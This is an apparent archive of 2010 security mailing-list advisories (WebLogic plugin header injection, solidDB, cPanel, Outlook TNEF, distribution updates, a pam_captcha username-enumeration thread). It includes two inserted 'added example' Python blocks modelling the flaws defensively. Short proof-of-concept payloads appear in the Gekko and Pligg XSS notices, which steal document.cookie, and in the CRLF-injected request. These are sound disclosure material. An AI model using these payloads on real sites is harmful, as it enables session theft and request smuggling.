typically terminate this encrypted communication, application servers
need a way of identifying the user who was authenticated.  The
WL-Proxy-Client-Cert header is used to communicate this information between
the web server plugin and application servers.  By injecting a false
version of this header, it would be possible to impersonate other users
and perhaps avoid presenting a client certificate at all.
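The proxy behaviour described in the two sections above, modelled as an added example (not VSR's or Oracle's code): a minimal front-end that percent-decodes the request-target and forwards it without re-encoding, beside a hardened variant that refuses control characters, re-encodes, and drops client-supplied WL-Proxy-* headers. The header names come from the advisory; the function names, the sample requests and the client address 203.0.113.5 are constructed for this example.

```python
"""Model of the URL re-encoding flaw described in the VSR advisory.

Added example, not VSR's or Oracle's code.  It assumes a minimal front-end
proxy that receives one HTTP/1.1 request, percent-decodes the request-target
and forwards the request to a back-end.  forward_unsafe() reproduces the
behaviour the advisory describes (decode once, never re-encode);
forward_safe() is the hardened counterpart.  Header names WL-Proxy-Client-IP
and WL-Proxy-Client-Cert are from the advisory; function names, sample
requests and the client address are constructed.
"""
from urllib.parse import quote, unquote

# Constructed sample: the request shown in the advisory, as received by the
# front-end web server.
ADVISORY_REQUEST = (
    b"GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"Connection: close\r\n\r\n"
)

# Constructed sample: a legitimate request with an encoded space and a
# non-ASCII query value, plus a client-supplied copy of a trusted header.
BENIGN_REQUEST = (
    b"GET /my%20file.gif?q=caf%C3%A9 HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"WL-Proxy-Client-IP: 10.0.0.1\r\n\r\n"
)

# Headers the plugin sets itself; any copy arriving from the client is untrusted.
PLUGIN_HEADERS = ("wl-proxy-client-ip", "wl-proxy-client-cert")

# Characters allowed to stay unescaped in a forwarded request-target.  '%' is
# deliberately absent so a decoded '%' is escaped again as %25.
TARGET_SAFE = "/?=&;:@+,!$'()*~"


class RejectedRequest(ValueError):
    """Raised by forward_safe() when the request-target is not forwardable."""


def parse_request(raw: bytes):
    """Split a raw request head into (method, target, version, headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, version, headers


def build_upstream(method, target, version, headers, client_ip):
    """Serialize the request the proxy sends to the WebLogic server, adding
    the trusted WL-Proxy-Client-IP header for the real client address."""
    out = [f"{method} {target} {version}"]
    out += [f"{name}: {value}" for name, value in headers]
    out.append(f"WL-Proxy-Client-IP: {client_ip}")
    return ("\r\n".join(out) + "\r\n\r\n").encode("latin-1")


def forward_unsafe(raw: bytes, client_ip: str) -> bytes:
    """Advisory behaviour: the decoded target is forwarded verbatim, so an
    encoded %0d%0a becomes a real line break inside the upstream request."""
    method, target, version, headers = parse_request(raw)
    return build_upstream(method, unquote(target), version, headers, client_ip)


def forward_safe(raw: bytes, client_ip: str) -> bytes:
    """Hardened variant: decode only to inspect, refuse control characters,
    re-encode before forwarding, and drop client-supplied WL-Proxy-* headers
    so the copy added by the proxy is the only one the back-end sees."""
    method, target, version, headers = parse_request(raw)
    decoded = unquote(target)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        raise RejectedRequest("control character in request-target")
    reencoded = quote(decoded, safe=TARGET_SAFE)
    kept = [(n, v) for n, v in headers if n.lower() not in PLUGIN_HEADERS]
    return build_upstream(method, reencoded, version, kept, client_ip)


def header_values(upstream: bytes, name: str):
    """Values of header `name` as the back-end would parse them."""
    _, _, _, headers = parse_request(upstream)
    return [v for n, v in headers if n.lower() == name.lower()]


if __name__ == "__main__":
    print(forward_unsafe(ADVISORY_REQUEST, "203.0.113.5").decode("latin-1"))
    try:
        forward_safe(ADVISORY_REQUEST, "203.0.113.5")
    except RejectedRequest as exc:
        print("rejected:", exc)
```

Running the unsafe path on the advisory's request yields exactly the upstream request shown in the advisory, with `X-hdr: x HTTP/1.1` parsed as a header line; the hardened path rejects it and, for the benign request, re-encodes the target and keeps only the proxy's own WL-Proxy-Client-IP value.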

More complex attacks are also possible by 

cPanel XSS Vulnerability

2010-07-15 Thread thomas
cPanel 11.25 is vulnerable to an XSS exploit as it fails to clean user-supplied 
input.



All versions prior to 47010 are affected. Please note that whilst this 
vulnerability is patched in version 47010, 47010 is currently on the 
bleeding-edge and isn't recommended for the stable environment.



Successful exploitation can result in user credentials being taken and being 
used to gain escalated privileges.



References: 
http://changelog.cpanel.net/?revision=0;tree=;treeview=;show=html;pp=50


ZDI-10-125: IBM SolidDB solid.exe Handshake Request Username Field Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-125: IBM SolidDB solid.exe Handshake Request Username Field Remote Code 
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-125
July 13, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
IBM

-- Affected Products:
IBM solidDB

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9983. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of IBM solidDB. Authentication is not required
to exploit this vulnerability.

The specific flaw exists within the solid.exe process which listens by
default on TCP port 1315. The code responsible for parsing the first
handshake packet does not properly validate the length of the username
field. By crafting an overly long value in the request an attacker can
exploit this to execute arbitrary code under the context of the SYSTEM
user.  

-- Vendor Response:
IBM has issued an update to correct this vulnerability. More
details can be found at:

http://www-01.ibm.com/support/docview.wss?uid=swg21439148&myns=swgimgmt&mynp=OCSSPK3V&mync=R

-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* AbdulAziz Hariri and Zein Fneish Insight Technologies


[ MDVSA-2010:132 ] python

2010-07-15 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2010:132
 http://www.mandriva.com/security/
 ___

 Package : python
 Date    : July 14, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0,
           Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in python:
 
 Multiple integer overflows in audioop.c in the audioop module in
 Python allow context-dependent attackers to cause a denial of service
 (application crash) via a large fragment, as demonstrated by a call
 to audioop.lin2lin with a long string in the first argument, leading
 to a buffer overflow.  NOTE: this vulnerability exists because of an
 incorrect fix for CVE-2008-3143.5 (CVE-2010-1634).
 
 The audioop module in Python does not verify the relationships between
 size arguments and byte string lengths, which allows context-dependent
 attackers to cause a denial of service (memory corruption and
 application crash) via crafted arguments, as demonstrated by a call
 to audioop.reverse with a one-byte string, a different vulnerability
 than CVE-2010-1634 (CVE-2010-2089).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089
 ___

 Updated Packages:


Re: pam_captcha username harvest vulnerability

2010-07-15 Thread Ian Maguire
On 7/14/2010 10:04 PM, Jordan Sissel wrote:
 On Tue, Jul 6, 2010 at 11:04 AM, Ian Maguireimagu...@superb.net  wrote:

 pam_captcha is visual text-based CAPTCHA challenge module for PAM that uses
 figlet to generate the CAPTCHAs.

 Project site:
 http://www.semicomplete.com/projects/pam_captcha/

 A site with a screen shot:
 http://www.michaelboman.org/how-to/securing-ssh-access-with-pam-captcha

 I found a security problem with the pam_captcha. If you enter a username
 that is not a valid user followed by the correct CAPTCHA, you do not get
 prompted for a password. You simply get prompted for another CAPTCHA.
 However, if you enter a username that is a valid user followed by the
 correct CAPTCHA, you will get prompted for a password. This means an
 attacker, or a script/bot could easily harvest a list of valid usernames
 simply by whether or not it prompts for a password after a valid captcha
 entry. I have duplicated this behavior in FreeBSD 8.0 which uses BSD's
 OpenPAM. From what I have seen this module is not compatible with Linux-PAM.

 I don't know enough C Fu to propose a patch. Until it is patched the
 solution is to disable pam_captcha in your pam config file. The creator of
 this module seems to think that using this module isn't really even
 necessary.

 http://www.semicomplete.com/blog/geekery/pam_captcha_research.html


 - ian


 I can't reproduce the behavior you describe on FreeBSD 8.0 nor on
 Ubuntu 9.10. It seems more likely that what you experience is actually
 misconfigured sshd/pam.

 With pam_captcha 1.3 on a fresh FreeBSD 8.0-RELEASE and this
 /etc/pam.d/sshd config:
 auth    sufficient  pam_opie.so   no_warn no_fake_prompts
 auth    requisite pam_opieaccess.so no_warn allow_local
 auth requisite pam_captcha.so randomstring
 #auth   sufficient  pam_krb5.so   no_warn try_first_pass
 #auth   sufficient  pam_ssh.so    no_warn try_first_pass
 auth    required  pam_unix.so   no_warn try_first_pass

 My sshd_config has this:
 ChallengeResponseAuthentication yes
 PasswordAuthentication no
 UsePAM yes

 What I see: Successful pass of the captcha with an invalid username
 results in being given another captcha or an abort (if this is
 multiple failures) and PAM logs the fact that there was a failure due
 to invalid user.


This behavior you are describing is exactly the problem. When you
enter a valid username, followed by a successful captcha entry, it
prompts you for a password. However, if you enter an invalid username,
followed by a successful captcha entry, it prompts you for another
captcha instead of a password. Since the behavior is different when it
is an invalid username, it is trivial to harvest a list of valid
usernames.
For example, if you are using pam_captcha, an attacker can immediately
know if you allow root ssh logins simply by attempting to ssh in as
root, and noticing whether or not there is a prompt for a password
after a valid captcha entry. They can do this with any username. Make
a script to automate it, and they can harvest a list of valid
usernames.


 For example, if you don't disable PasswordAuthentication then pam
 failures (captcha or other failures) will give up after a few
 tries and move on to Password auth (no captcha) auth instead.

 Are you sure this isn't something misconfigured on your side? Can you
 publish your sshd_config and pam configs?


This was on a fresh install of FreeBSD 8.0 with no modifications to
the sshd config, so I won't bother sharing that one. The only
change I made to the pam config was adding the pam captcha line at the
beginning. I'll paste the /etc/pam.d/sshd config below:
#
# $FreeBSD: src/etc/pam.d/sshd,v 1.16.10.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
# PAM configuration for the sshd service
#
# auth
auth            requisite       pam_captcha.so          randomstring
auth            sufficient      pam_opie.so             no_warn no_fake_prompts
auth            requisite       pam_opieaccess.so       no_warn allow_local
#auth           sufficient      pam_krb5.so             no_warn try_first_pass
#auth           sufficient      pam_ssh.so              no_warn try_first_pass
auth            required        pam_unix.so             no_warn try_first_pass
# account
account         required        pam_nologin.so
#account        required        pam_krb5.so
account         required        pam_login_access.so
account         required        pam_unix.so
# session
#session        optional        pam_ssh.so
session         required        pam_permit.so
# password
#password       sufficient      pam_krb5.so             no_warn try_first_pass
password        required        pam_unix.so             no_warn try_first_pass


 -Jordan




[USN-962-1] VTE vulnerability

2010-07-15 Thread Kees Cook
===
Ubuntu Security Notice USN-962-1  July 15, 2010
vte vulnerability
CVE-2010-2713
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  libvte9 1:0.20.0-0ubuntu2.1

Ubuntu 9.10:
  libvte9 1:0.22.2-0ubuntu2.1

Ubuntu 10.04 LTS:
  libvte9 1:0.23.5-0ubuntu1.1

After a standard system update you need to restart your session to make
all the necessary changes.

Details follow:

Janne Snabb discovered that applications using VTE, such as gnome-terminal,
did not correctly filter window and icon title request escape codes.  If a
user were tricked into viewing specially crafted output in their terminal,
a remote attacker could execute arbitrary commands with user privileges.


Updated packages for Ubuntu 9.04:



[security bulletin] HPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access

2010-07-15 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02286083
Version: 1

HPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution 
of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-07-12
Last Updated: 2010-07-13

Potential Security Impact: Remote execution of arbitrary code, remote Denial of 
Service (DoS), remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with Insight Control 
for Linux (IC-LX). The vulnerabilities could be remotely exploited to allow 
execution of arbitrary code, remote Denial of Service (DoS), and remote 
unauthorized access.

References: CVE-2009-0692, CVE-2007-5497, CVE-2007-2452, CVE-2010-0001, 
CVE-2010-1129, CVE-2008-5110

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control for Linux 6.0 and previous versions

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                   Base Score
  CVE-2009-0692  (AV:A/AC:L/Au:N/C:C/I:C/A:C)         8.3
  CVE-2007-5497  (AV:N/AC:M/Au:N/C:P/I:P/A:N)         4.9
  CVE-2007-2452  (AV:N/AC:M/Au:S/C:P/I:P/A:P)         6.4
  CVE-2010-0001  (AV:N/AC:M/Au:N/C:P/I:P/A:P)         6.8
  CVE-2010-1129  (AV:N/AC:L/Au:N/C:P/I:P/A:P)         7.5
  CVE-2008-5110  (AV:N/AC:M/Au:N/C:C/I:C/A:C)        10.0
===
 Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

Note: HP Insight Control for Linux v6.1 incorporates updated packages that 
include security updates for Dhclient, E2fsprogs, Findutils, Gzip, PHP and 
Syslog-ng.

RESOLUTION

HP has provided HP Insight Control for Linux v6.1 to resolve this 
vulnerability. The updated kit can be downloaded as follows. Browse to 
http://www.hp.com/go/ic-lx and click on Software Downloads.

PRODUCT SPECIFIC INFORMATION
None

HISTORY
Version:1 (rev.1) - 12 July 2010 Initial Release
Version:2 (rev.2) - 13 July 2010 Changed abbreviated name to IC-LX

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's 

XSS vulnerability in Gekko Web Builder

2010-07-15 Thread advisory
Vulnerability ID: HTB22474
Reference: 
http://www.htbridge.ch/advisory/xss_vulnerability_in_gekko_web_builder.html
Product: Gekko Web Builder
Vendor: Baby Gekko IT Consulting ( http://www.babygekko.com/ ) 
Vulnerable Version: v0.90 ALPHA and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the /admin/index.php script to 
properly sanitize user-supplied input in the app variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:
http://host/admin/index.php?app=settings;scriptalert(document.cookie)/script




Outlook PR_ATTACH_METHOD file execution vulnerability

2010-07-15 Thread Akita Software Security

Outlook PR_ATTACH_METHOD file execution vulnerability

Yorick Koster, October 2009


Abstract


It has been discovered that certain e-mail messages cause Outlook to
create Windows shortcut-like attachments or messages within Outlook.
Through specially crafted TNEF streams with certain MAPI attachment
properties, it is possible to set a path name to files to be executed.
When a user double clicks on such an attachment or message, Outlook will
proceed to execute the file that is set by the path name value. These
files can be local files, but also files stored remotely, for example on a
file share. Exploitation is limited by the fact that it is not
possible for attackers to supply command line options.


See also

- CVE-2010-0266 [2]
- MS10-045 [3] Vulnerability in Microsoft Office Outlook Could Allow
Remote Code Execution (978212)
- Security Research & Defense blog: [4] MS10-045: Microsoft Office
Outlook Remote Code Execution vulnerability
- KB978212 [5] MS10-045: Vulnerability in Microsoft Office Outlook could
allow remote code execution
- KB2271150 [6] You cannot open linked file attachments in Outlook:
Outlook blocked access to the following potentially unsafe
attachments
- SSD: [7] SecuriTeam Secure Disclosure program


Tested version


This issue was tested on the latest versions of Outlook 2003 SP3 and
Outlook 2007 SP2.


Fix


Microsoft released MS10-045 [8] that blocks unsafe use of the
PR_ATTACH_METHOD property in e-mail messages.


Introduction


Microsoft Office Outlook is a personal information manager. It is often
mainly used as an e-mail application, but it also includes a calendar,
task manager, contact manager, note taking, a journal and web browsing.

Outlook supports various e-mail formats, including plain text, HTML and
TNEF. TNEF is a proprietary format used by Microsoft Outlook and
Microsoft Exchange Server. TNEF messages or TNEF streams consist of
message and/or attachment attributes. These attributes contain basic
properties, such as message subject, date sent and attachment title
(file name). Additional attributes can be set using MAPI properties,
which are stored in attMAPIProps or attAttachment TNEF structures.


MAPI attachment properties


In MAPI, there are a couple of properties available that are specific
for handling e-mail attachments. One of these properties is the
PR_ATTACH_METHOD property. This property can be set to a MAPI-defined
constant and represents the way the contents of an attachment can be
accessed. For most attachments, this property will be set to
ATTACH_BY_VALUE. When set to this value, the attachment data is either
stored in the PR_ATTACH_DATA_BIN MAPI property or it is stored in an
attAttachData TNEF structure.

If the PR_ATTACH_METHOD property is set to ATTACH_BY_REFERENCE,
ATTACH_BY_REF_ONLY or ATTACH_BY_REF_RESOLVE, Outlook expects a
fully-qualified path name instead of an embedded attachment. This path
name is set using either the PR_ATTACH_PATHNAME or
PR_ATTACH_LONG_PATHNAME MAPI property. The path name can be set to a
Universal naming convention (UNC) name.
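The attribute stream described above is simple enough to walk by hand. The following is an added example, not code from the advisory or from Microsoft: it builds a small constructed TNEF stream, parses it (signature, then level/id/length/data/checksum records, each checksum being the 16-bit sum of the data bytes), pulls out the message class and the attachment titles, and flags an IPM.Document message whose attachment carries no embedded attAttachData. The attribute ids are the documented TNEF values; the flag is a triage signal only, since attachment data may also travel as PR_ATTACH_DATA_BIN inside attMAPIProps, which this parser does not decode.

```python
import struct

# TNEF constants; attribute ids carry the data type in the high word and the id in the low word.
TNEF_SIGNATURE      = 0x223E9F78
LVL_MESSAGE         = 1
LVL_ATTACHMENT      = 2
ATT_TNEF_VERSION    = 0x00089006
ATT_MESSAGE_CLASS   = 0x00078008   # attMessageClass: NUL-terminated string such as "IPM.Note"
ATT_ATTACH_RENDDATA = 0x00069002   # attAttachRenddata: opens every attachment
ATT_ATTACH_TITLE    = 0x00018010   # attAttachTitle: file name
ATT_ATTACH_DATA     = 0x0006800F   # attAttachData: embedded bytes (the ATTACH_BY_VALUE case)


def encode_attribute(level, att_id, data):
    """Serialise one attribute: level byte, id, length, payload, 16-bit checksum of the payload."""
    return struct.pack("<BII", level, att_id, len(data)) + data + struct.pack("<H", sum(data) & 0xFFFF)


def build_tnef(message_class, attach_title, attach_data=None):
    """Constructed sample input for the parser below (a minimal stream, not a real message)."""
    body = encode_attribute(LVL_MESSAGE, ATT_TNEF_VERSION, struct.pack("<I", 0x00010000))
    body += encode_attribute(LVL_MESSAGE, ATT_MESSAGE_CLASS, message_class.encode("ascii") + b"\x00")
    body += encode_attribute(LVL_ATTACHMENT, ATT_ATTACH_RENDDATA, bytes(14))
    body += encode_attribute(LVL_ATTACHMENT, ATT_ATTACH_TITLE, attach_title.encode("ascii") + b"\x00")
    if attach_data is not None:
        body += encode_attribute(LVL_ATTACHMENT, ATT_ATTACH_DATA, attach_data)
    return struct.pack("<IH", TNEF_SIGNATURE, 0x1234) + body   # 0x1234: arbitrary key


def parse_tnef(stream):
    """Walk the attribute list, verifying the signature and every per-attribute checksum."""
    if len(stream) < 6 or struct.unpack_from("<I", stream, 0)[0] != TNEF_SIGNATURE:
        raise ValueError("not a TNEF stream")
    pos, attrs = 6, []
    while pos < len(stream):
        if len(stream) - pos < 9:
            raise ValueError("truncated attribute header")
        level, att_id, length = struct.unpack_from("<BII", stream, pos)
        pos += 9
        data = stream[pos:pos + length]
        if len(data) != length or len(stream) - pos - length < 2:
            raise ValueError("truncated attribute data")
        pos += length
        checksum = struct.unpack_from("<H", stream, pos)[0]
        pos += 2
        if checksum != sum(data) & 0xFFFF:
            raise ValueError("attribute checksum mismatch")
        attrs.append((level, att_id, data))
    return attrs


def summarize(attrs):
    """Extract the message class and, per attachment, its title and whether data is embedded."""
    summary = {"message_class": None, "attachments": []}
    for level, att_id, data in attrs:
        if level == LVL_MESSAGE and att_id == ATT_MESSAGE_CLASS:
            summary["message_class"] = data.rstrip(b"\x00").decode("latin-1")
        elif level == LVL_ATTACHMENT:
            if att_id == ATT_ATTACH_RENDDATA:
                summary["attachments"].append({"title": None, "embedded": False})
            elif att_id == ATT_ATTACH_TITLE and summary["attachments"]:
                summary["attachments"][-1]["title"] = data.rstrip(b"\x00").decode("latin-1")
            elif att_id == ATT_ATTACH_DATA and summary["attachments"]:
                summary["attachments"][-1]["embedded"] = True
    return summary


def needs_review(summary):
    """IPM.Document message whose attachment has no embedded data: inspect the attach method/path."""
    mc = summary["message_class"] or ""
    return mc.startswith("IPM.Document") and any(not a["embedded"] for a in summary["attachments"])


if __name__ == "__main__":
    sample = build_tnef("IPM.Document.txtfile", "notes.txt")
    print(summarize(parse_tnef(sample)), needs_review(summarize(parse_tnef(sample))))
```

A gateway that already unpacks winmail.dat can feed the stream to `parse_tnef` and route flagged messages for inspection rather than delivering them; the checksum and length checks also stop a malformed stream from being silently mis-parsed.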


ATTACH_BY_REF_RESOLVE


A message or attachment can have a Message Class property that loosely
defines the type of a message, contact or other personal information
manager object. For normal e-mail messages, the message class is set to
IPM.Note. The Message Class is set by the TNEF attMessageClass
structure or by the PR_MESSAGE_CLASS MAPI property.

If the Message Class is set to IPM.Document, Outlook will process this
message as an e-mail message consisting of a single attachment. By
appending a subclass to IPM.Document it is possible to state more
specifically what type of document the attachment is. For example, a Message
Class of IPM.Document.txtfile indicates that the attachment is a plain
text file, while IPM.Document.Excel.Sheet.12 indicates a Microsoft Excel

XSS vulnerability in Pligg search module

2010-07-15 Thread advisory
Vulnerability ID: HTB22467
Reference: 
http://www.htbridge.ch/advisory/xss_vulnerability_in_pligg_search_module.html
Product: Pligg
Vendor: Pligg, LLC ( http://www.pligg.com/demo/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to a failure in the search.php script to properly 
sanitize user-supplied input in the search variable. Successful exploitation of 
this vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, or disclosure or modification of 
sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:
http://host/search/1;<script>alert(document.cookie)</script>




[SECURITY] [DSA 2070-1] New freetype packages fix several vulnerabilities

2010-07-15 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- 
Debian Security Advisory DSA-2070-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
July 14, 2010 http://www.debian.org/security/faq
- 

Package: freetype
Vulnerability  : several
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2010-2497 CVE-2010-2498 CVE-2010-2499 CVE-2010-2500 
CVE-2010-2519 CVE-2010-2520 CVE-2010-2527

Robert Swiecki discovered several vulnerabilities in the FreeType font 
library, which could lead to the execution of arbitrary code if a
malformed font file is processed.

Also, several buffer overflows were found in the included demo programs.


For the stable distribution (lenny), these problems have been fixed in
version 2.3.7-2+lenny2.

For the unstable distribution (sid), these problems have been fixed in
version 2.4.0-1.

We recommend that you upgrade your freetype packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny2.dsc
Size/MD5 checksum: 1219 a5930e5dfa3757bed045a67b7ef0e3e2
  
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7.orig.tar.gz
Size/MD5 checksum:  1567540 c1a9f44fde316470176fd6d66af3a0e8
  
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny2.diff.gz
Size/MD5 checksum:36156 f1cb13247588b40f8f6c9d232df7efde

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_alpha.deb
Size/MD5 checksum:   775180 d9d1a2680550113aab5a5aa23998458e
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_alpha.deb
Size/MD5 checksum:   411954 63d800f83bd77f18b9307cd77b5cfd1d
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_alpha.deb
Size/MD5 checksum:   253784 b95be0af80d58e4e0818dd9b66447d9e
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_alpha.udeb
Size/MD5 checksum:   296564 6e080492ee03692588c5953b36bade6d

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_amd64.udeb
Size/MD5 checksum:   269680 4c9e6efc6c36f0867c74dde033b97ac8
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_amd64.deb
Size/MD5 checksum:   223010 5b9c55fc8ef35251ccdc3c1d22b13edd
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_amd64.deb
Size/MD5 checksum:   713084 b5933f78399f7d690f786fb7f04d1eca
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_amd64.deb
Size/MD5 checksum:   385600 741877f101eef1dd6f77aead47ddbba1

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_arm.deb
Size/MD5 checksum:   205134 624b8b38b6cea2d569c70a18a5f78934
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_arm.udeb
Size/MD5 checksum:   242180 d7c5020f9cb5417378b80571bc2eccd4
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_arm.deb
Size/MD5 checksum:   686080 a12f9cb0b5f76071ed204cfdcc571cd5
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_arm.deb
Size/MD5 checksum:   356996 ff79207089cce445fa6d0514156f12cf

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_armel.deb
Size/MD5 checksum:   684278 7654ae1ba45138f11c53da2acce6055c
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_armel.deb
Size/MD5 checksum:   210040 2d05fa53273572a89c81c9085a291fee
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_armel.udeb
Size/MD5 checksum:   236524 727d731977efad369b51fdc28d42bade
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_armel.deb
Size/MD5 checksum:   353412 

XSS vulnerability in Taggon CMS

2010-07-15 Thread advisory
Vulnerability ID: HTB22477
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_taggon_cms.html
Product: Taggon CMS
